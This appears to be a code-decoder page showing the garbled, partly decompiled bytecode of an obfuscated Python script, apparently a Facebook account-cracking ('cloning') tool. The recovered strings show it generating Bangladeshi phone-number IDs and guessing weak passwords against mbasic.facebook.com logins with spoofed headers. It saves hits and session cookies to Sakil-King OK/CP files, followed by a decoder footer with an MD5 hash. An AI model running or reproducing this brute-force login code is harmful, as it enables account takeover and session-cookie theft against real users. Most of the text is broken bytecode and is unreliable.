d%dS)&NruD[1;97m[[1;92m[1;97m][1;92m WHAT IS YOUR NAME [1;91m: [1;32mzP[97;1m[[92;1m+[97;1m] [1;96m[BD CODE] [1;92m> [1;92m 017 - 019 - 018 - 016z;[97;1m[[92;1m+[97;1m] [1;92mCHOOSE YOUR COUNTRY CODE : zr[97;1m[[92;1m+[97;1m] EXAMPLE: 3000, 5000, 15000, 20000
[97;1m[[92;1m+[97;1m] [1;92mCHOOSE CLONING LIMIT : rc3RK|]"}tjtjV#dSrrrastringdigitsr4_s r	<genexpr>zY2.<locals>.<genexpr>Qs.EEqfmFM22EEEEEEr!r2rz?[97;1m[[92;1m+[97;1m][0;92m CRACK ID    [1;34m: [0;92mrVz?[97;1m[[92;1m+[97;1m][0;92m SIM CODE    [1;34m: [0;92mz?[97;1m[[92;1m+[97;1m][0;92m START TIME   [1;34m: [0;92mrxz ~ r
rTz7[10;97m===============================================rr9r
BangladeshrBanglaz@@@###z###@@@102030203040304050405060sumaiyasadiyajannatulmababasumiyaz" CRACK PROCESS HAS BEEN COMPLETED )rgetuidrrrrr
intrErr
ThreadPoolrrr?rrr rDrrrr#)usertwfnamecodelimitnmbrnmp	TUTULKINGtllover.rJs      rrr?s^	D	CIIJJIg
HHH	f	g	gDIg
HHH	
noooZ[[DIg
HHHabb
c
cEeggEEE!HHEEEEEC		#	#	#
3y

T^^	bceefiijjj
bcgghhh
{bd{{gi{{ln{{sx{{{|AB}C}CCDGGHKLNLPLPQRLSHTHTTUXXZ]]^aa	b	b	b
JKKK	3	3DQRRabb$t)DbqbM,|\demnvwAIJRS[\efnoyzBCKLCt)CYs3r2222		3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3

./////s/D.I**I.1I.c
g}tjdttd}td}t	dtd}ttd}t
|D]D}ddt
d	d
D}||Etd5}tjdttt|}t	d
|zt	dtj
dzdztzt	dt	d|D]N}	||z|	z|z}
||||z|dz|dz|dz|dz|dz|dz|dzg
}|t |
||O	dddn#1swxYwYt	dt	ddS)NruL[92;1m[97;1m[[92;1m+[97;1m] [1;92mENTER FAST NAME[1;37m>[1;92m uR[92;1m[97;1m[[92;1m[97;1m] [1;93mENTER LAST NAME[1;37m>[38;5;208m ua[92;1m[97;1m[[92;1m+[97;1m] [0;92mEXAMPLE[1;37m>[1;93m @gmail.com [1;[email protected] uO[92;1m[97;1m[[92;1m[97;1m] [1;94mSelect Your Mail[1;37m>[1;92m u[92;1m[97;1m[[92;1m+[97;1m] [1;92mEXAMPLE[1;37m> [1;93m3000 [1;92m5000 [1;95m15000 [1;91m20000
[92;1m[97;1m[[92;1m[97;1m] [38;5;208mCHOOSE CLONING LIMIT[1;37m>[1;92m rc3RK|]"}tjtjV#dSrrrs rrzBER.<locals>.<genexpr>ns.GGqfmFM22GGGGGGr!r9rTrruK[92;1m[97;1m[[92;1m+[97;1m] [10;92mYOUR TOTAL ID[1;37m> [1;93mu][92;1m[97;1m[[92;1m[97;1m] [38;5;208mSTARTED YOUR CLONING TIME[0;97m:> [1;92mr&rVuJ[92;1m[97;1m[[92;1m+[97;1m] [1;92mUse Flight Mode For Speed Up uA[92;1m[0;97m=============================================rrrrrrrz: [[1;92m[1;34m[1;92m] Crack process has been completedz4 [[1;92m[1;34m[1;92m] Ids saved in ok.txt,cp.txt)rrrrr
rrErrrrr?rstrftimerr#rcerek)rkodekodexdoaminrrryaarirgururJpwxs      rrrds	DIg
HHHtuuD{||E	FGGG
y
z
zFTUU
V
VEeggGGE!AJJGGGGGC		#	#	#,u
	\'
T^^
pqssttt
CDHDQRYDZDZZ[^^`cc	d	d	d
jkkk
WXXX	,	,Du*T/&(Cd5jeDKWTRUXVZ[_V_`dek`klpqwlwxCLLC++++		,,,,,,,,,,,,,,,,

OPPP	
IJJJJJs!C/GG!$G!c	|D];}tjt}tjttt
tttttg}tj}|
dj}tjdt#|dtjdt#|dtjdt#|dtjdt#|ddd||dd		}d
ddd
dddddddddd|d}	|d||	j}
|j}d|vrdd|jD}|dd}
t3d |zd!z|zd"zt5|
zt3d#|zd$zt7d%d&|d\'z|zd(zt:|nd)|vrdd*|jD}|d+d,}
t7d-d&|
d\'z|zd.zt>|n=t@dz
a tBj"d/|d0t@d1|d2tGt:d3tGt>d4ftBj"$dS#YdSxYw)5Nhttps://mbasic.facebook.comrEr9rFname="m_ts" value="(.*?)"name="li" value="(.*?)"rtLog In	rHrIm_tsli
try_numberunrecognized_triesemailrMloginmbasic.facebook.comGEThttpstext/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9zen-US,en;q=0.9rUz9"(Not(A:Brand";v="99", "Chromium";v="113", "Opera";v="96"?0z"macOS"r7navigatenone?1r	authorityr/schemer;rDrVz	sec-ch-uazsec-ch-ua-mobilezsec-ch-ua-platformrAr?r>r@r9r:Dhttps://mbasic.facebook.com/login/device-based/regular/login/?refsrcrXrYr^rNc$g|]
\}}|dz|zSrPr%rRs  rr6zrcerek.<locals>.<listcomp>$^^^ic%CGEM^^^r!u-[1;92m[[1;92mSakil[1;37m[1;92mOk] u [1;37m[1;92m z	 [1;96m u*[0;93m[]= COOKIES [1;37m [10;92mr/sdcard/Sakil-King.OK.txtrr]rr\c$g|]
\}}|dz|zSrPr%rRs  rr6zrcerek.<locals>.<listcomp>rr!/sdcard/Sakil-King.CP.txt 

u[SakilM1][1;97m [[1;92m[1;97m]>~<[[1;92m$[1;97m] [[1;92mOK[1;97m[1;92m+[1;97m][1;97m [[1;93mCP[1;97m[1;93m
[1;97m] 
)%rrarer@rBrfrCrmrhrArFrrgr<r2rjrkrrlr.r,rmrorrnr
rrroksrcpsrdrrr?r)rJrrpsprobirIfree_fblog_data
header_freefblolog_cookiesrJcids       rrrs*
;
4	4	B}T""mQq1Qq1-..#%%;;<==Bi :CLLIIOOPQRRi >GMMSSTUVV98#g,,GGMMaPP4c\'llCCII!LL!$		(=`/(T $"+(($"),llagoyFlGGL_--//4466##((^^7?;S;S;U;U;[;[;];]^^^__TC=S
NsRSnnoqqtBBCJKNCOCOOPPP
HMbP
Q
Q
Q
-s
3
3
9
93u9R<;L
M
M
M
ZZ___
Uk))((^^7?;S;S;U;U;[;[;];]^^^__TC=S-s
3
3
9
93u9R<;M
N
N
N
ZZ___
U
a
]_]_]_`d`d`degegeghklohphphphpqtuxqyqyqyqyz	{	{	|	|

	TTsOOO	c	|D]c}tjt}tjttt
tttttg}tj}|
dj}tjdt#|dtjdt#|dtjdt#|dtjdt#|ddd||dd		}d
ddd
dddddddddd|d}	|d||	j}
|j}d|vrdd|jD}|dd}
t3jd t7d!|zd"z|zd#zt9|
zt7d$|zd%zt;d&d\'|d(z|zd)zt> |nd*|vrdd+|jD}|d,d-}
t3jd.t;d/d\'|d(z|zd0ztB |netDdz
a"tFj$d1|d2tDd3|d4tKt>d5tKtBd6ftFj$&dS#YdSxYw)7NrrEr9rFrrrtrrrrrrz;en-BD,en;q=0.9,bn-BD;q=0.8,bn;q=0.7,en-GB;q=0.6,en-US;q=0.5rUz9"(Not(A:Brand";v="99", "Chromium";v="111", "Opera";v="96"rz	"Windows"r7rrrrrrrr^rNc$g|]
\}}|dz|zSrPr%rRs  rr6zTUTULKING.<locals>.<listcomp>rr!rrr`u)[10;92m[Sakil[10;37m[10;92mOk] u [10;37m[10;92m z	[10;96m u)[0;93m[]= COOKIES [1;37m [1;92mrrrr]rr\c$g|]
\}}|dz|zSrPr%rRs  rr6zTUTULKING.<locals>.<listcomp>rr!rrzespeak -a 300 " C,p"rrru[SakilM2][1;97m [[1;92mrrrr)\'rrarer@rBrfrCrmrhrArFrrgr<r2rjrkrrlr.r,rmrorrnrrr
rrrrrrrdrrr?r)rJr.rrrrrIrrrrrrJrs       rrrsF
;
4	4	B-%%C!Aa!Aa011B&((Gkk"?@@EGi :CLLIIOOPQRRi >GMMSSTUVV98#g,,GGMMaPP4c\'llCCII!LL!$		H+@`\(T $"-(($"),Mdjr|IJJOB00227799K;&&((^^7?;S;S;U;U;[;[;];]^^^__TC=S
Y9
:
:
:
GKLiijlln||~EFI~J~JJKKK
GLRO
P
P
P
-s
3
3
9
93u9R<;L
M
M
M
ZZ___
U,,((^^7?;S;S;U;U;[;[;];]^^^__TC=S
Y-
.
.
.-s
3
3
9
93u9R<;M
N
N
N
ZZ___
U
a
]_]_]_`d`d`degegeghklohphphphpqtuxqyqyqyqyz	{	{	|	|

sO(O,,O1__main__zgit pullr3CPDUMPztouch .prox.txt)rrrrjsonrrjrplatformbase64rbs4rrL
rich.tablermerich.consolersolconcurrent.futuresrr!rgp
rich.panelrnelrichr
cetak
rich.markdownrmarkrich.columnsrcolrprintr
	rich.textrtekzrrrwaktuinstallCONrnowr	dt_stringcurrentyearr monthrdayrr\'zlibpipurllibr
subprocessModuleNotFoundErrorressr	mechanizerequests.exceptionsr)rOrfrecokbrutrgrwprincpr<r2rhrr	Exceptionrread
splitlinesrExdr	randrangerccdfr{r\'r5jrbuakuraaraluaku2rMuakrrrdr(rrrqoprekr/	lisensiku	taplikasitokenkurJlisensikunirrugen4ugen5REDrHrDYELLOWBLUEORANGEr@rBrFrfrCrmrhrArrsirrzhhrkkr{asurrrcmdrltxrrrrrrrrrrrrrrgetpassattempsrusernamepasswordrrlinrr`rrr$rrrrrrr"mkdirr%r!r<module>r2s						
7888		
"###		
 !!!>=======================================$$$$$$#"""""\'\'\'\'\'\'$$$$$$999999$$$$$$######******\'\'\'\'\'\'   """"""CEE.hlnnLL!!	
(,..\][          IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIAAAAAAABBB	@AAAAAtt========================================$$$$$$!OOOCCCCCC3333333!!!
BIIJJJ
BI   !
HHH6	
H	Ax|NOOTk#T""""AAA?@@@@@@@@A	T+c!!,,..
%,,B&6Aq6Aq
6Cq6Aq6Aq6Aq6Aq
1Q1111Q1111a11!11a11!11a11dJ6=111226=SSSTT6As6=SSSTT36Bs6D6Bs!
88q88A8q8!8Q88!8Q8888Q8888Q88U	r
0
0A\'6C6C6=SSSTT6=SSSTT6=SSSTT6=SSSTT6AqH6Aq6Aq$	/1//q/!/Q//1/a//A////A//RTTVWXYZ[\]_`bcefhiklnoqrtQtO3tBr$uVIiK


	WWWCBCBCB		
fmQq1QK 


!   	c""$$q\'ll88BA
CCA
CSSSfff(kO	M	qw	FdV	c:	
umnnHumnnH38s??
TUUU	9:::

deee	1		\'			,8
"%%%PEfEfEfP+	+	+	Z	"0"0"0JKKK:@
@
@
F@
@
@
JZ	*44444444	#$$$$44DFFFFFsx 2FF-*F-H%H>=H>4JJ-J((J-1[[	[[![22[69\

\\""\&)marshalexecloads	Tutulking<module>r	sS]W]Cd(Dd(Dd(Ed(Ed(Ed(Ed(Ed(r)marshalexecloads	Tutulking<module>r	sS]W]Sp(Tp(Tp(Up(Up(Up(Up(Up(r)marshalexecloads	Tutulking<module>r	sS]W]c|(d|(d|(e|(e|(e|(e|(e|(r)marshalexecloads	Tutulking<module>r	sS]W]sH)tH)tH)uH)uH)uH)uH)uH)r)marshalexecloads	Tutulking<module>r	sS]W]CU)DU)DU)EU)EU)EU)EU)EU)r)marshalexecloads	Tutulking<module>r	sS]W]Sa)Ta)Ta)Ua)Ua)Ua)Ua)Ua)r)marshalexecloads	Tutulking<module>r	sS]W]cm)dm)dm)em)em)em)em)em)r)marshalexecloads	Tutulking<module>r	sS]W]sy)ty)ty)uy)uy)uy)uy)uy)r)marshalexecloads	Tutulking<module>r	sS]W]CF*DF*DF*EF*EF*EF*EF*EF*r)marshalexecloads	Tutulking<module>r	sS]W]SR*TR*TR*UR*UR*UR*UR*UR*r)marshalexecloads	Tutulking<module>r	sS]W]c^*d^*d^*e^*e^*e^*e^*e^*r)marshalexecloads	Tutulking<module>r	sS]W]sj*tj*tj*uj*uj*uj*uj*uj*r)marshalexecloads	Tutulking<module>r	sS]W]Cw*Dw*Dw*Ew*Ew*Ew*Ew*Ew*r)marshalexecloads	Tutulking<module>r	sS]W]SC+TC+TC+UC+UC+UC+UC+UC+r)marshalexecloads	Tutulking<module>r	sS]W]cO+dO+dO+eO+eO+eO+eO+eO+r)marshalexecloads	Tutulking<module>r	sS]W]s[+t[+t[+u[+u[+u[+u[+u[+r)marshalexecloads	Tutulking<module>r	sS]W]Ch+Dh+Dh+Eh+Eh+Eh+Eh+Eh+r)marshalexecloads	Tutulking<module>r	sS]W]St+Tt+Tt+Ut+Ut+Ut+Ut+Ut+r)marshalexecloads	Tutulking<module>r	sS]W]c@,d@,d@,e@,e@,e@,e@,e@,r)marshalexecloads	Tutulking<module>r	sS]W]sL,tL,tL,uL,uL,uL,uL,uL,r)marshalexecloads	Tutulking<module>r	sS]W]CY,DY,DY,EY,EY,EY,EY,EY,r)marshalexecloads	Tutulking<module>r	sS]W]Se,Te,Te,Ue,Ue,Ue,Ue,Ue,r)marshalexecloads	Tutulking<module>r	sS]W]cq,dq,dq,eq,eq,eq,eq,eq,r)marshalexecloads	Tutulking<module>r	sS]W]s},t},t},u},u},u},u},u},r)marshalexecloads	Tutulking<module>r	sS]W]CJ-DJ-DJ-EJ-EJ-EJ-EJ-EJ-r)marshalexecloads	Tutulking<module>r	sS]W]SV-TV-TV-UV-UV-UV-UV-UV-r)marshalexecloads	Tutulking<module>r	sS]W]cb-db-db-eb-eb-eb-eb-eb-r)marshalexecloads	Tutulking<module>r	sS]W]qn-rn-rn-sn-sn-sn-sn-sn-r)marshalexecloads	Tutulking<module>r	sS]W]z-@{-@{-A{-A{-A{-A{-A{-r)marshalexecloads	Tutulking<module>r	sS]W]RG.SG.SG.TG.TG.TG.TG.TG.r)marshalexecloads	Tutulking<module>r	sS]W]bS.cS.cS.dS.dS.dS.dS.dS.r)marshalexecloads	Tutulking<module>r	sS]W]p_.q_.q_.r_.r_.r_.r_.r_.r)marshalexecloads	Tutulking<module>r	sS]W]@l.Al.Al.Bl.Bl.Bl.Bl.Bl.r)marshalexecloads	Tutulking<module>r	sS]W]Px.Qx.Qx.Rx.Rx.Rx.Rx.Rx.r)marshalexecloads	Tutulking<module>r	sS]W]`D/aD/aD/bD/bD/bD/bD/bD/r)marshalexecloads	Tutulking<module>r	sS]W]pP/qP/qP/rP/rP/rP/rP/rP/r)marshalexecloads	Tutulking<module>r	sS]W]@]/A]/A]/B]/B]/B]/B]/B]/r)marshalexecloads	Tutulking<module>r	sS]W]Pi/Qi/Qi/Ri/Ri/Ri/Ri/Ri/r)marshalexecloads	Tutulking<module>r	sS]W]`u/au/au/bu/bu/bu/bu/bu/r)marshalexecloads	Tutulking<module>r	sS]W]pA0qA0qA0rA0rA0rA0rA0rA0r)marshalexecloads	Tutulking<module>r	sS]W]@N0AN0AN0BN0BN0BN0BN0BN0r)marshalexecloads	Tutulking<module>r	sS]W]PZ0QZ0QZ0RZ0RZ0RZ0RZ0RZ0r)marshalexecloads	Tutulking<module>r	sS]W]`f0af0af0bf0bf0bf0bf0bf0r)marshalexecloads	Tutulking<module>r	sS]W]pr0qr0qr0rr0rr0rr0rr0rr0r)marshalexecloads	Tutulking<module>r	sS]W]@0A0A0B0B0B0B0B0r)marshalexecloads	Tutulking<module>r	sS]W]hK1iK1iK1jK1jK1jK1jK1jK1r)marshalexecloads	Tutulking<module>r	sS]W]xW1yW1yW1zW1zW1zW1zW1zW1r)marshalexecloads	Tutulking<module>r	sS]W]Hd1Id1Id1Jd1Jd1Jd1Jd1Jd1r)marshalexecloads	Tutulking<module>r	sS]W]Xp1Yp1Yp1Zp1Zp1Zp1Zp1Zp1r)marshalexecloads	Tutulking<module>r	sS]W]h|1i|1i|1j|1j|1j|1j|1j|1r)marshalexecloads	Tutulking<module>r	sS]W]uH2vH2vH2wH2wH2wH2wH2wH2r)marshalexecloads	Tutulking<module>r	sS]W]BU2CU2CU2DU2DU2DU2DU2DU2r)marshalexecloads	Tutulking<module>r	sS]W]Pa2Qa2Qa2Ra2Ra2Ra2Ra2Ra2r)marshalexecloads	Tutulking<module>r	sS]W]]m2^m2^m2_m2_m2_m2_m2_m2r)marshalexecloads	Tutulking<module>r	sS]W]jy2ky2ky2ly2ly2ly2ly2ly2r)marshalexecloads	Tutulking<module>r	sS]W]wE3xE3xE3yE3yE3yE3yE3yE3r)marshalexecloads	Tutulking<module>r	sS]W]DR3ER3ER3FR3FR3FR3FR3FR3r)marshalexecloads	Tutulking<module>r	sS]W]R^3S^3S^3T^3T^3T^3T^3T^3r)marshalexecloads	Tutulking<module>r	sS]W]_j3`j3`j3aj3aj3aj3aj3aj3r)marshalexecloads	Tutulking<module>r	sS]W]lv3mv3mv3nv3nv3nv3nv3nv3r)marshalexecloads	Tutulking<module>r	sS]W]yB4zB4zB4{B4{B4{B4{B4{B4r)marshalexecloads	Tutulking<module>r	sS]W]FO4GO4GO4HO4HO4HO4HO4HO4r)marshalexecloads	Tutulking<module>r	sS]W]S[4T[4T[4U[4U[4U[4U[4U[4r)marshalexecloads	Tutulking<module>r	sS]W]`g4ag4ag4bg4bg4bg4bg4bg4r)marshalexecloads	Tutulking<module>r	sS]W]ms4ns4ns4os4os4os4os4os4r)marshalexecloads	Tutulking<module>r	sS]W]z4{4{4|4|4|4|4|4r)marshalexecloads	Tutulking<module>r	sS]W]_L5`L5`L5aL5aL5aL5aL5aL5r')) ?>

Did this file decode correctly?

Original Code

# Encoded By Tutul-King
# Fb Link: https://www.facebook.com/Tutul.King.Ok.Bro
# Fb Link: https://www.facebook.com/Tutul.Official.Account
# https://github.com/Tutul-King

import marshal


Function Calls

None

Variables

None

Stats

MD5 acc7b7601ae0d8bc0ef1a14ce5394c6f
Eval Count 0
Decode Time 157 ms